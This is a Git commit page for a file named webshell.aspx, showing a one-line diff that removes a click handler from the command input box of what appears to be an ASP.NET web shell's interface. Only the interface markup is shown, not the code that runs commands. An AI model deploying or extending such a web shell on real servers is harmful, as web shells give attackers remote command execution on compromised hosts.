Update webshell.aspx

This commit is contained in:
Mariusz 2019-02-04 17:28:33 +01:00 committed by GitHub
parent faf9dba2aa
commit 8501c75007
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -89,7 +89,7 @@
<asp:Label id="Hostname" runat='server'></asp:Label>
</td>
<td width="60%">
<input type=text id="CommandTextbox" runat="server" value='' onClick="this.select();" style="width:80%" onkeydown="if (event.keyCode == 13) { this.form.submit(); return false; }"/>
<input type=text id="CommandTextbox" runat="server" value='' onClick="" style="width:80%" onkeydown="if (event.keyCode == 13) { this.form.submit(); return false; }"/>
</td>
</tr>
<tr>